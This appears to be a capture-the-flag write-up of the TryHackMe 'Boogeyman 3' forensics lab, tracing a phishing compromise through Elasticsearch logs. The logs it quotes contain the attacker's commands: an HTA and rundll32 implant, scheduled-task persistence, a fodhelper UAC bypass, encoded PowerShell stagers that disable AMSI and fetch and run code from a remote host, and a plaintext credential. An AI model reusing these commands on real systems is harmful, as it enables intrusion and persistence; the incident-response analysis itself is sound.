Boogeyman 3
The Boogeyman emerges from the darkness again.
Last updated
The Boogeyman emerges from the darkness again.
Last updated
Challenge Link: TryHackMe - Boogeyman 3
Without tripping any security defences of Quick Logistics LLC, the Boogeyman was able to compromise one of the employees and stayed in the dark, waiting for the right moment to continue the attack. Using this initial email access, the threat actors attempted to expand the impact by targeting the CEO, Evan Hutchinson.
The email appeared questionable, but Evan still opened the attachment despite the scepticism. After opening the attached document and seeing that nothing happened, Evan reported the phishing email to the security team.
Upon receiving the phishing email report, the security team investigated the workstation of the CEO. During this activity, the team discovered the email attachment in the downloads folder of the victim.
In addition, the security team also observed a file inside the ISO payload, as shown in the image below.
Lastly, it was presumed by the security team that the incident occurred between August 29 and August 30, 2023.
There are multiple services running for this room:
$ nmap --min-rate 1000 -p- -v 10.10.138.205
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9200/tcp open wap-wsp
9300/tcp open vrace
Mainly for a hosted ELK Stack application:
Meaning TCP Port 9200 should be for the Elastic API.
There seems to be Windows Event Logs ingested into the platform:
$ curl http://elastic:elastic@10.10.241.17:9200/_cat/indices?v
health status index uuid pri rep docs.count docs.deleted store.size pri.store.size
green open .geoip_databases lM0DBBCZRzeTnKl49aAmJA 1 0 3 0 2.6mb 2.6mb
green open .security-7 Fp59LRkXSwm1jHrq8gpibg 1 0 60 0 258kb 258kb
green open .apm-custom-link Ek1KihMXRwOoAIGOBcIU-w 1 0 0 0 226b 226b
green open .kibana_task_manager_7.17.6_001 WSbAubYpTRmGec9_aFSUHg 1 0 18 3447 1.4mb 1.4mb
green open .apm-agent-configuration ffMaJ0oFQZKgTziSPYgewg 1 0 0 0 226b 226b
green open .async-search 2-WPoD_4QpOoKpd0SBYM2g 1 0 0 0 252b 252b
green open .kibana_7.17.6_001 lXdTCB9mRHm56zAO4YZ50A 1 0 42 0 4.8mb 4.8mb
yellow open winlogbeat-7.17.6-2023.11.02-000002 CDv3Ai6xSvu2HhxvzaUcjA 1 1 0 0 226b 226b
yellow open winlogbeat-7.17.6-2023.08.29-000001 9g4EM-4oRImckEii7zspjg 1 1 29093 0 47.6mb 47.6mb
green open .tasks 7kEiTgXrTwmguQ3TbIgUHA 1 0 12 0 57.7kb 57.7kb
Using the following JSON query to see what the analyst will be dealing with:
{
"query":{
"bool": {
"must": {
"wildcard": {
"user.name": "*"
}
},
"should": [{
"match": {
"event.category": "process"
}
}],
"filter": {
"range": {
"@timestamp": {
"gte": "2023-08-29T00:00:00",
"lte": "2023-08-31T00:00:00"
}
}
}
}
},
"_source": ["user.name", "host.hostname"]
}
For the first 10000 logs based on process creations within the specified timeframe, a bulk of it was generated by evan.hutchinson
and allan.smith
:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=10000 | jq -r '.hits.hits[]."_source".user.name' | sort | uniq -c | sort -nr
5337 evan.hutchinson
1837 allan.smith
1767 Administrator
427 DC01$
385 SYSTEM
104 WKSTN-0051$
42 itadmin
22 WKSTN-1327$
22 LOCAL SERVICE
21 NETWORK SERVICE
[..omitted..]
Now, looking at the number of endpoints with process creation logs, more than half was generated on WKSTN-0051
and will now be assumed to be the workstation of evan.hutchinson
:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=10000 | jq -r '.hits.hits[]."_source".host.hostname' | sort | uniq -c | sort -nr
5695 WKSTN-0051
2174 DC01
2131 WKSTN-1327
For this section, the following JSON query will be utilized but the value of user.name
will be changed depending on the user being investigated:
{
"query":{
"bool": {
"must": {
"term": {
"user.name": "<USERNAME OF INTEREST>"
}
},
"should": [{
"match": {
"event.category": "process"
}
}],
"filter": {
"range": {
"@timestamp": {
"gte": "2023-08-29T00:00:00",
"lte": "2023-08-31T00:00:00"
}
}
}
}
},
"_source": ["@timestamp", "host.hostname", "user.name", "user.domain", "process.name", "process.command_line", "process.pid", "process.parent.name", "process.parent.executable", "process.parent.pid"]
}
Upon execution of the HTA file (PID 6392), three new processes were spawned:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6392
2023-08-29T23:51:15.856Z evan.hutchinson 6392 2940 "C:\Windows\SysWOW64\mshta.exe" "D:\ProjectFinancialSummary_Q3.pdf.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
2023-08-29T23:51:16.738Z evan.hutchinson 3832 6392 "C:\Windows\System32\xcopy.exe" /s /i /e /h D:\review.dat C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat
2023-08-29T23:51:16.771Z evan.hutchinson 3680 6392 "C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
2023-08-29T23:51:16.809Z evan.hutchinson 6204 6392 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A = New-ScheduledTaskAction -Execute 'rundll32.exe' -Argument 'C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat,DllRegisterServer'; $T = New-ScheduledTaskTrigger -Daily -At 06:00; $S = New-ScheduledTaskSettingsSet; $P = New-ScheduledTaskPrincipal $env:username; $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S; Register-ScheduledTask Review -InputObject $D -Force;
It copies an implant somewhere in the filesystem and executes a function, DllRegisterServer
, from review.dat
via rundll32.exe
. It eventually creates a scheduled task (named Review
) presumably for persistence:
$A = New-ScheduledTaskAction -Execute 'rundll32.exe' -Argument 'C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat,DllRegisterServer';
$T = New-ScheduledTaskTrigger -Daily -At 06:00;
$S = New-ScheduledTaskSettingsSet;
$P = New-ScheduledTaskPrincipal $env:username;
$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S;
Register-ScheduledTask Review -InputObject $D -Force;
Tracing the executions of review.dat
to figure out what it does, the related PIDs were searched:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 3680
2023-08-29T23:51:16.771Z evan.hutchinson 3680 6392 "C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
2023-08-29T23:51:17.116Z evan.hutchinson 4672 3680 "C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 4672
2023-08-29T23:51:17.116Z evan.hutchinson 4672 3680 "C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
2023-08-29T23:53:47.951Z evan.hutchinson 6660 4672 "C:\Windows\system32\cmd.exe" /c "whoami /all"
2023-08-29T23:54:12.765Z evan.hutchinson 5496 4672 "C:\Windows\system32\net.exe" users
2023-08-29T23:54:16.129Z evan.hutchinson 6932 4672 "C:\Windows\system32\net.exe" localgroup administrators
2023-08-29T23:54:48.565Z evan.hutchinson 4504 4672 "C:\Windows\system32\whoami.exe" /groups
2023-08-29T23:54:48.608Z evan.hutchinson 4468 4672 "C:\Windows\system32\whoami.exe" /groups
2023-08-29T23:54:49.043Z evan.hutchinson 5308 4672 "C:\Windows\system32\fodhelper.exe"
2023-08-29T23:54:49.213Z evan.hutchinson 5180 4672 "C:\Windows\system32\fodhelper.exe"
2023-08-30T01:40:37.178Z evan.hutchinson 2260 4672 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$credential = (New-Object PSCredential -ArgumentList ('QUICKLOGISTICS\allan.smith', (ConvertTo-SecureString 'Tr!ckyP@ssw0rd987' -AsPlainText -Force))) ; Invoke-Command -Credential $credential -ComputerName WKSTN-1327 -ScriptBlock {powershell -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==}"
The attacker seems to have been able to gain local administrator privileges on WKSTN-0051
as the user evan.hutchinson
based on the sequence of user enumeration commands and eventually running fodhelper.exe
which could be utilized for UAC Bypass primarily for Windows 10.
It is also important to note that the last execution discovered above was for a lateral movement attempt to WKSTN-1327
as allan.smith
. For now, looking into executions spawned from fodhelper.exe
:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 5180
2023-08-29T23:54:49.213Z evan.hutchinson 5180 4672 "C:\Windows\system32\fodhelper.exe"
2023-08-29T23:54:49.444Z evan.hutchinson 7116 5180 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x
It's taking a base64 encoded string from the registry and runs it via PowerShell. What that command is could be retrieved from the logs by following the execution:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 7116
2023-08-29T23:54:49.444Z evan.hutchinson 7116 5180 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x
2023-08-29T23:54:50.125Z evan.hutchinson 6160 7116 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAH0AdwBTADEAJgBWAE4AcQBvAEkAWQAqAEcAIwA1AC0AUABsAHYAewBwADIAZgA9ADQAWgA/AHUAYQB0AEAAPAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcgBsAGsASABWAFgAVwBiAGIAPQBUAHAAbQBVAEQAaQBiAFgAcABmAGkAVQBVADEALwBtAHcAcQB3AG0AZQBuAHQAZwBiADMASQA9ACIAKQA7ACQAZABhAHQAYQA9ACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHMAZQByACsAJAB0ACkAOwAkAGkAdgA9ACQAZABhAHQAYQBbADAALgAuADMAXQA7ACQAZABhAHQAYQA9ACQAZABhAHQAYQBbADQALgAuACQAZABhAHQAYQAuAGwAZQBuAGcAdABoAF0AOwAtAGoAbwBpAG4AWwBDAGgAYQByAFsAXQBdACgAJgAgACQAUgAgACQAZABhAHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA
$ echo "SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcgAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApACwAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAH0AdwBTADEAJgBWAE4AcQBvAEkAWQAqAEcAIwA1AC0AUABsAHYAewBwADIAZgA9ADQAWgA/AHUAYQB0AEAAPAAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcgBsAGsASABWAFgAVwBiAGIAPQBUAHAAbQBVAEQAaQBiAFgAcABmAGkAVQBVADEALwBtAHcAcQB3AG0AZQBuAHQAZwBiADMASQA9ACIAKQA7ACQAZABhAHQAYQA9ACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHMAZQByACsAJAB0ACkAOwAkAGkAdgA9ACQAZABhAHQAYQBbADAALgAuADMAXQA7ACQAZABhAHQAYQA9ACQAZABhAHQAYQBbADQALgAuACQAZABhAHQAYQAuAGwAZQBuAGcAdABoAF0AOwAtAGoAbwBpAG4AWwBDAGgAYQByAFsAXQBdACgAJgAgACQAUgAgACQAZABhAHQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA" | base64 -d
